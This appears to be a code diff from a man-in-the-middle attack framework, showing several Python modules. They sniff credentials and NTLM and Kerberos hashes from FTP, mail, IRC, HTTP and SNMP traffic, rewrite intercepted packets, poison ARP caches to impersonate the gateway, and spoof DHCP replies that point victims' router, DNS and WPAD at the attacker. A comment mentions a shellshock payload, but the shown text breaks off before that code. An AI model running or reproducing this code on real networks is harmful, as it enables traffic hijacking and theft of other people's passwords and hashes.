num = full_load.lower().count(count_str)
if num > 1:
lines = full_load.count('\r\n')
if lines > 1:
full_load = full_load.split('\r\n')[-2] # -1 is ''
return full_load
def parse_ftp(full_load, dst_ip_port):
'''
Parse out FTP creds
'''
print_strs = []
# Sometimes FTP packets double up on the authentication lines
# We just want the latest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
full_load = double_line_checker(full_load, 'USER')
# FTP and POP potentially use identical client > server auth pkts
ftp_user = re.match(ftp_user_re, full_load)
ftp_pass = re.match(ftp_pw_re, full_load)
if ftp_user:
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
elif ftp_pass:
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
return print_strs
def mail_decode(src_ip_port, dst_ip_port, mail_creds):
'''
Decode base64 mail creds
'''
try:
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
decoded = decoded.replace('\x00', ' ')
except TypeError:
decoded = None
except UnicodeDecodeError as e:
decoded = None
if decoded != None:
msg = 'Decoded: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq):
'''
Catch IMAP, POP, and SMTP logins
'''
# Handle the first packet of mail authentication
# if the creds aren't in the first packet, save it in mail_auths
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
global mail_auths
found = False
# Sometimes mail packets double up on the authentication lines
# We just want the latest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
full_load = double_line_checker(full_load, 'auth')
# Client to server 2nd+ pkt
if src_ip_port in mail_auths:
if seq in mail_auths[src_ip_port][-1]:
stripped = full_load.strip('\r\n')
try:
decoded = base64.b64decode(stripped)
msg = 'Mail authentication: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
except TypeError:
pass
mail_auths[src_ip_port].append(ack)
# Server responses to client
# seq always = last ack of tcp stream
elif dst_ip_port in mail_auths:
if seq in mail_auths[dst_ip_port][-1]:
# Look for any kind of auth failure or success
a_s = 'Authentication successful'
a_f = 'Authentication failed'
# SMTP auth was successful
if full_load.startswith('235') and 'auth' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# SMTP failed
elif full_load.startswith('535 '):
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP/POP/SMTP failed
elif ' fail' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP auth success
elif ' OK [' in full_load:
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# Pkt was not an auth pass/fail so its just a normal server ack
# that it got the client's first auth pkt
else:
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[dst_ip_port].append(ack)
# Client to server but it's a new TCP seq
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
else:
mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE)
if mail_auth_search != None:
auth_msg = full_load
# IMAP uses the number at the beginning
if mail_auth_search.group(1) != None:
auth_msg = auth_msg.split()[1:]
else:
auth_msg = auth_msg.split()
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
# rather than just an AUTH PLAIN
if len(auth_msg) > 2:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Mail authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
try:
del mail_auths[src_ip_port]
except KeyError:
pass
found = True
# Mail auth regex was found and src_ip_port is not in mail_auths
# Pkt was just the initial auth cmd, next pkt from client will hold creds
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[src_ip_port] = [ack]
# At least 1 mail login style doesn't fit in the original regex:
# 1 login "username" "password"
# This also catches FTP authentication!
# 230 Login successful.
elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None:
# FTP authentication failures trigger this
#if full_load.lower().startswith('530 login'):
# return
auth_msg = full_load
auth_msg = auth_msg.split()
if 2 < len(auth_msg) < 5:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
found = True
if found == True:
return True
def irc_logins(full_load, pkt):
'''
Find IRC logins
'''
user_search = re.match(irc_user_re, full_load)
pass_search = re.match(irc_pw_re, full_load)
pass_search2 = re.search(irc_pw_re2, full_load.lower())
if user_search:
msg = 'IRC nick: %s' % user_search.group(1)
return msg
if pass_search:
msg = 'IRC pass: %s' % pass_search.group(1)
return msg
if pass_search2:
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
host = headers['host']
else:
host = ''
if parsing_pcap is True:
if http_line != None:
method, path = parse_http_line(http_line, http_methods)
http_url_req = get_http_url(method, host, path, headers)
if http_url_req != None:
if verbose == False:
if len(http_url_req) > 98:
http_url_req = http_url_req[:99] + '...'
printer(src_ip_port, None, http_url_req)
# Print search terms
searched = get_http_searches(http_url_req, body, host)
if searched:
printer(src_ip_port, dst_ip_port, searched)
# Print user/pwds
if body != '':
user_passwd = get_login_pass(body)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
user_msg = 'HTTP username: %s' % http_user
printer(src_ip_port, dst_ip_port, user_msg)
pass_msg = 'HTTP password: %s' % http_pass
printer(src_ip_port, dst_ip_port, pass_msg)
except UnicodeDecodeError:
pass
# Print POST loads
# ocsp is a common SSL post load that's never interesting
if method == 'POST' and 'ocsp.' not in host:
try:
if verbose == False and len(body) > 99:
# If it can't decode to utf8 we're probably not interested in it
msg = 'POST load: %s...' % body[:99].encode('utf8')
else:
msg = 'POST load: %s' % body.encode('utf8')
printer(src_ip_port, None, msg)
except UnicodeDecodeError:
pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC, SMBv1/2, LDAP)
NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
if NTLMSSP2:
parse_ntlm_chal(NTLMSSP2.group(), ack)
if NTLMSSP3:
ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
if ntlm_resp_found != None:
printer(src_ip_port, dst_ip_port, ntlm_resp_found)
# Look for authentication headers
if len(headers) == 0:
authenticate_header = None
authorization_header = None
for header in headers:
authenticate_header = re.match(authenticate_re, header)
authorization_header = re.match(authorization_re, header)
if authenticate_header or authorization_header:
break
if authorization_header or authenticate_header:
# NETNTLM
netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
if netntlm_found != None:
printer(src_ip_port, dst_ip_port, netntlm_found)
# Basic Auth
parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header)
def get_http_searches(http_url_req, body, host):
'''
Find search terms from URLs. Prone to false positives but rather err on that side than false negatives
search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command
'''
false_pos = ['i.stack.imgur.com']
searched = None
if http_url_req != None:
searched = re.search(http_search_re, http_url_req, re.IGNORECASE)
if searched == None:
searched = re.search(http_search_re, body, re.IGNORECASE)
if searched != None and host not in false_pos:
searched = searched.group(3)
# Eliminate some false+
try:
# if it doesn't decode to utf8 it's probably not user input
searched = searched.decode('utf8')
except UnicodeDecodeError:
return
# some ad sites trigger this function with single digits
if searched in [str(num) for num in range(0,10)]:
return
# nobody's making >100 character searches
if len(searched) > 100:
return
msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' '))
return msg
def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
'''
Parse basic authentication over HTTP
'''
if authorization_header:
# authorization_header sometimes is triggered by failed ftp
try:
header_val = headers[authorization_header.group()]
except KeyError:
return
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
try:
basic_auth_creds = base64.decodestring(basic_auth_b64)
except Exception:
return
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq):
'''
Parse NTLM hashes out
'''
# Type 2 challenge from server
if authenticate_header != None:
chal_header = authenticate_header.group()
parse_netntlm_chal(headers, chal_header, ack)
# Type 3 response from client
elif authorization_header != None:
resp_header = authorization_header.group()
msg = parse_netntlm_resp_msg(headers, resp_header, seq)
if msg != None:
return msg
def parse_snmp(src_ip_port, dst_ip_port, snmp_layer):
'''
Parse out the SNMP version and community string
'''
if type(snmp_layer.community.val) == str:
ver = snmp_layer.version.val
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
printer(src_ip_port, dst_ip_port, msg)
return True
def get_http_url(method, host, path, headers):
'''
Get the HTTP method + URL from requests
'''
if method != None and path != None:
# Make sure the path doesn't repeat the host header
if host != '' and not re.match('(http(s)?://)?'+host, path):
http_url_req = method + ' ' + host + path
else:
http_url_req = method + ' ' + path
http_url_req = url_filter(http_url_req)
return http_url_req
def headers_to_dict(header_lines):
'''
Convert the list of header lines into a dictionary
'''
headers = {}
for line in header_lines:
lineList=line.split(': ', 1)
key=lineList[0].lower()
if len(lineList)>1:
headers[key]=lineList[1]
else:
headers[key]=""
return headers
def parse_http_line(http_line, http_methods):
'''
Parse the header with the HTTP method in it
'''
http_line_split = http_line.split()
method = ''
path = ''
# Accounts for pcap files that might start with a fragment
# so the first line might be just text data
if len(http_line_split) > 1:
method = http_line_split[0]
path = http_line_split[1]
# This check exists because responses are much different than requests e.g.:
# HTTP/1.1 407 Proxy Authentication Required ( Access is denied. )
# Add a space to method because there's a space in http_methods items
# to avoid false+
if method+' ' not in http_methods:
method = None
path = None
return method, path
def parse_http_load(full_load, http_methods):
'''
Split the raw load into list of headers and body string
'''
try:
headers, body = full_load.split("\r\n\r\n", 1)
except ValueError:
headers = full_load
body = ''
header_lines = headers.split("\r\n")
# Pkts may just contain hex data and no headers in which case we'll
# still want to parse them for usernames and passwords
http_line = get_http_line(header_lines, http_methods)
if not http_line:
headers = ''
body = full_load
header_lines = [line for line in header_lines if line != http_line]
return http_line, header_lines, body
def get_http_line(header_lines, http_methods):
'''
Get the header with the http command
'''
for header in header_lines:
for method in http_methods:
# / is the only char I can think of that's in every http_line
# Shortest valid: "GET /", add check for "/"?
if header.startswith(method):
http_line = header
return http_line
def parse_netntlm_chal(headers, chal_header, ack):
'''
Parse the netntlm server challenge
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
'''
try:
header_val2 = headers[chal_header]
except KeyError:
return
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
try:
msg2 = header_val2[1]
except IndexError:
return
msg2 = base64.decodestring(msg2)
parse_ntlm_chal(msg2, ack)
def parse_ntlm_chal(msg2, ack):
'''
Parse server challenge
'''
global challenge_acks
Signature = msg2[0:8]
try:
msg_type = struct.unpack("<I",msg2[8:12])[0]
except Exception:
return
assert(msg_type==2)
ServerChallenge = msg2[24:32].encode('hex')
# Keep the dict of ack:challenge to less than 50 chals
if len(challenge_acks) > 50:
challenge_acks.popitem(last=False)
challenge_acks[ack] = ServerChallenge
def parse_netntlm_resp_msg(headers, resp_header, seq):
'''
Parse the client response to the challenge
'''
try:
header_val3 = headers[resp_header]
except KeyError:
return
header_val3 = header_val3.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
try:
msg3 = base64.decodestring(header_val3[1])
except binascii.Error:
return
return parse_ntlm_resp(msg3, seq)
def parse_ntlm_resp(msg3, seq):
'''
Parse the 3rd msg in NTLM handshake
Thanks to psychomario
'''
if seq in challenge_acks:
challenge = challenge_acks[seq]
else:
challenge = 'CHALLENGE NOT FOUND'
if len(msg3) > 43:
# Thx to psychomario for below
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
domain = msg3[domoff:domoff+domlen].replace("\0", "")
user = msg3[useroff:useroff+userlen].replace("\0", "")
# Original check by psychomario, might be incorrect?
#if lmhash != "0"*48: #NTLMv1
if ntlen == 24: #NTLMv1
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
return msg
elif ntlen > 60: #NTLMv2
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
return msg
def url_filter(http_url_req):
'''
Filter out the common but uninteresting URLs
'''
if http_url_req:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
if any(http_url_req.endswith(i) for i in d):
return
return http_url_req
def get_login_pass(body):
'''
Regex out logins and passwords from a string
'''
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password',
'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
def printer(src_ip_port, dst_ip_port, msg):
if dst_ip_port != None:
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
# All credentials will have dst_ip_port, URLs will not
log.info("{}".format(print_str))
else:
print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
log.info("{}".format(print_str))
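To make the HTTP credential path concrete, a small self-contained sketch of what get_login_pass() and printer() produce for a captured POST body (field names and addresses are invented):
body = 'email=alice@example.org&password=s3cret&submit=Sign+in'
creds = get_login_pass(body)
if creds is not None:
    # creds == ('email=alice@example.org', 'password=s3cret')
    printer('192.168.1.50:51234', '93.184.216.34:80', 'HTTP username: %s' % creds[0])
    printer('192.168.1.50:51234', '93.184.216.34:80', 'HTTP password: %s' % creds[1])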

View file

@ -1,42 +0,0 @@
from core.utils import set_ip_forwarding, iptables
from core.logger import logger
from scapy.all import *
from traceback import print_exc
from netfilterqueue import NetfilterQueue
formatter = logging.Formatter("%(asctime)s [PacketFilter] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("PacketFilter", formatter)
class PacketFilter:
def __init__(self, filter):
self.filter = filter
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(0, self.modify)
self.nfqueue.run()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
for filter in self.filter:
try:
execfile(filter)
except Exception:
log.debug("Error occurred in filter", filter)
print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()
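Each entry in self.filter is the path to a Python file that is exec'd for every queued packet, with the scapy packet object (and scapy's classes, via the star import above) in scope; a toy filter along those lines, with a made-up filename and addresses:
# dns_redirect.py (hypothetical filter file)
if packet.haslayer(DNSQR) and 'example.org' in packet[DNSQR].qname:
    packet[IP].dst = '10.0.0.1'
    del packet[IP].chksum    # drop the checksums so scapy recomputes them for the modified packet
    del packet[UDP].chksum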

View file

@ -1,253 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from core.logger import logger
from time import sleep
from scapy.all import *
formatter = logging.Formatter("%(asctime)s [ARPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ARPpoisoner", formatter)
class ARPpoisoner:
name = 'ARP'
optname = 'arp'
desc = 'Redirect traffic using ARP requests or replies'
version = '0.1'
def __init__(self, options):
try:
self.gatewayip = str(IPAddress(options.gateway))
except AddrFormatError as e:
sys.exit("Specified an invalid IP address as gateway")
self.gatewaymac = options.gatewaymac
if options.gatewaymac is None:
self.gatewaymac = getmacbyip(options.gateway)
if not self.gatewaymac: sys.exit("Error: could not resolve Gateway's mac address")
self.ignore = self.get_range(options.ignore)
if self.ignore is None: self.ignore = []
self.targets = self.get_range(options.targets)
self.arpmode = options.arpmode
self.debug = False
self.send = True
self.interval = 3
self.interface = options.interface
self.myip = options.ip
self.mymac = options.mac
self.arp_cache = {}
log.debug("gatewayip => {}".format(self.gatewayip))
log.debug("gatewaymac => {}".format(self.gatewaymac))
log.debug("targets => {}".format(self.targets))
log.debug("ignore => {}".format(self.ignore))
log.debug("ip => {}".format(self.myip))
log.debug("mac => {}".format(self.mymac))
log.debug("interface => {}".format(self.interface))
log.debug("arpmode => {}".format(self.arpmode))
log.debug("interval => {}".format(self.interval))
def start(self):
#create a L3 and L2 socket, to be used later to send ARP packets
#this doubles performance since send() and sendp() open and close a socket on each packet
self.s = conf.L3socket(iface=self.interface)
self.s2 = conf.L2socket(iface=self.interface)
if self.arpmode == 'rep':
t = threading.Thread(name='ARPpoisoner-rep', target=self.poison, args=('is-at',))
elif self.arpmode == 'req':
t = threading.Thread(name='ARPpoisoner-req', target=self.poison, args=('who-has',))
t.setDaemon(True)
t.start()
if self.targets is None:
log.debug('Starting ARPWatch')
t = threading.Thread(name='ARPWatch', target=self.start_arp_watch)
t.setDaemon(True)
t.start()
def get_range(self, targets):
if targets is None:
return None
try:
target_list = []
for target in targets.split(','):
if '/' in target:
target_list.extend(list(IPNetwork(target)))
elif '-' in target:
start_addr = IPAddress(target.split('-')[0])
try:
end_addr = IPAddress(target.split('-')[1])
ip_range = IPRange(start_addr, end_addr)
except AddrFormatError:
end_addr = list(start_addr.words)
end_addr[-1] = target.split('-')[1]
end_addr = IPAddress('.'.join(map(str, end_addr)))
ip_range = IPRange(start_addr, end_addr)
target_list.extend(list(ip_range))
else:
target_list.append(IPAddress(target))
return target_list
except AddrFormatError:
sys.exit("Specified an invalid IP address/range/network as target")
def start_arp_watch(self):
try:
sniff(prn=self.arp_watch_callback, filter="arp", store=0)
except Exception as e:
if "Interrupted system call" not in e:
log.error("[ARPWatch] Exception occurred when invoking sniff(): {}".format(e))
pass
def arp_watch_callback(self, pkt):
if self.send is True:
if ARP in pkt and pkt[ARP].op == 1: #who-has only
#broadcast mac is 00:00:00:00:00:00
packet = None
#print str(pkt[ARP].hwsrc) #mac of sender
#print str(pkt[ARP].psrc) #ip of sender
#print str(pkt[ARP].hwdst) #mac of destination (often broadcst)
#print str(pkt[ARP].pdst) #ip of destination (Who is ...?)
if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)):
log.debug("[ARPWatch] {} is asking where the Gateway is. Sending the \"I'm the gateway biatch!\" reply!".format(pkt[ARP].psrc))
#send repoison packet
packet = ARP()
packet.op = 2
packet.psrc = self.gatewayip
packet.hwdst = str(pkt[ARP].hwsrc)
packet.pdst = str(pkt[ARP].psrc)
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)):
log.debug("[ARPWatch] Gateway asking where {} is. Sending the \"I'm {} biatch!\" reply!".format(pkt[ARP].pdst, pkt[ARP].pdst))
#send repoison packet
packet = ARP()
packet.op = 2
packet.psrc = self.gatewayip
packet.hwdst = '00:00:00:00:00:00'
packet.pdst = str(pkt[ARP].pdst)
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)):
log.debug("[ARPWatch] Gateway asking where {} is. Sending the \"This is the h4xx0r box!\" reply!".format(pkt[ARP].pdst))
packet = ARP()
packet.op = 2
packet.psrc = self.myip
packet.hwdst = str(pkt[ARP].hwsrc)
packet.pdst = str(pkt[ARP].psrc)
try:
if packet is not None:
self.s.send(packet)
except Exception as e:
if "Interrupted system call" not in e:
log.error("[ARPWatch] Exception occurred while sending re-poison packet: {}".format(e))
def resolve_target_mac(self, targetip):
targetmac = None
try:
targetmac = self.arp_cache[targetip] # see if we already resolved that address
#log.debug('{} has already been resolved'.format(targetip))
except KeyError:
#This following replaces getmacbyip(), much faster this way
packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)
try:
resp, _ = sndrcv(self.s2, packet, timeout=2, verbose=False)
except Exception as e:
resp= ''
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
if len(resp) > 0:
targetmac = resp[0][1].hwsrc
self.arp_cache[targetip] = targetmac # shove that address in our cache
log.debug("Resolved {} => {}".format(targetip, targetmac))
else:
log.debug("Unable to resolve MAC address of {}".format(targetip))
return targetmac
def poison(self, arpmode):
sleep(2)
while self.send:
if self.targets is None:
self.s2.send(Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op=arpmode))
elif self.targets:
for target in self.targets:
targetip = str(target)
if (targetip != self.myip) and (target not in self.ignore):
targetmac = self.resolve_target_mac(targetip)
if targetmac is not None:
try:
#log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
sleep(self.interval)
def stop(self):
self.send = False
sleep(3)
count = 2
if self.targets is None:
log.info("Restoring subnet connection with {} packets".format(count))
pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.gatewaymac, psrc=self.gatewayip, op="is-at")
for i in range(0, count):
self.s2.send(pkt)
elif self.targets:
for target in self.targets:
targetip = str(target)
targetmac = self.resolve_target_mac(targetip)
if targetmac is not None:
log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
try:
for i in range(0, count):
self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
#close the sockets
self.s.close()
self.s2.close()

View file

@ -1,147 +0,0 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
import binascii
import random
from netaddr import IPAddress, IPNetwork
from core.logger import logger
from scapy.all import *
formatter = logging.Formatter("%(asctime)s [DHCPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DHCPpoisoner", formatter)
class DHCPpoisoner():
def __init__(self, options):
self.interface = options.interface
self.ip_address = options.ip
self.mac_address = options.mac
self.shellshock = options.shellshock
self.netmask = options.netmask
self.debug = False
self.dhcp_dic = {}
log.debug("interface => {}".format(self.interface))
log.debug("ip => {}".format(self.ip_address))
log.debug("mac => {}".format(self.mac_address))
log.debug("netmask => {}".format(self.netmask))
log.debug("shellshock => {}".format(self.shellshock))
def start(self):
self.s2 = conf.L2socket(iface=self.interface)
t = threading.Thread(name="DHCPpoisoner", target=self.dhcp_sniff)
t.setDaemon(True)
t.start()
def stop(self):
self.s2.close()
def dhcp_sniff(self):
try:
sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=self.interface)
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning: {}".format(e))
def get_client_ip(self, xid, dhcp_options):
try:
field_name, req_addr = dhcp_options[2]
if field_name == 'requested_addr':
return 'requested', req_addr
raise ValueError
except ValueError:
for field in dhcp_options:
if isinstance(field, tuple) and (field[0] == 'requested_addr'):
return 'requested', field[1]
if xid in self.dhcp_dic.keys():
client_ip = self.dhcp_dic[xid]
return 'stored', client_ip
net = IPNetwork(self.ip_address + '/24')
return 'generated', str(random.choice(list(net)))
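# Handle sniffed DHCP traffic: reply to DISCOVERs with a spoofed OFFER and to REQUESTs with an ACK that point the router, DNS and WPAD (option 252) entries at the attacker, optionally appending a shellshock payload in option 114.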
def dhcp_callback(self, resp):
if resp.haslayer(DHCP):
log.debug('Saw a DHCP packet')
xid = resp[BOOTP].xid
mac_addr = resp[Ether].src
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
if resp[DHCP].options[0][1] == 1:
method, client_ip = self.get_client_ip(xid, resp[DHCP].options)
if method == 'requested':
log.info("Got DHCP DISCOVER from: {} requested_addr: {} xid: {}".format(mac_addr, client_ip, hex(xid)))
else:
log.info("Got DHCP DISCOVER from: {} xid: {}".format(mac_addr, hex(xid)))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "offer"),
('server_id', self.ip_address),
('subnet_mask', self.netmask),
('router', self.ip_address),
('name_server', self.ip_address),
('dns_server', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(252, 'http://{}/wpad.dat\\n'.format(self.ip_address)),
"end"]))
log.info("Sending DHCP OFFER")
self.s2.send(packet)
if resp[DHCP].options[0][1] == 3:
method, client_ip = self.get_client_ip(xid, resp[DHCP].options)
if method == 'requested':
log.info("Got DHCP REQUEST from: {} requested_addr: {} xid: {}".format(mac_addr, client_ip, hex(xid)))
else:
log.info("Got DHCP REQUEST from: {} xid: {}".format(mac_addr, hex(xid)))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', self.ip_address),
('subnet_mask', self.netmask),
('router', self.ip_address),
('name_server', self.ip_address),
('dns_server', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(252, 'http://{}/wpad.dat\\n'.format(self.ip_address))]))
if self.shellshock:
log.info("Sending DHCP ACK with shellshock payload")
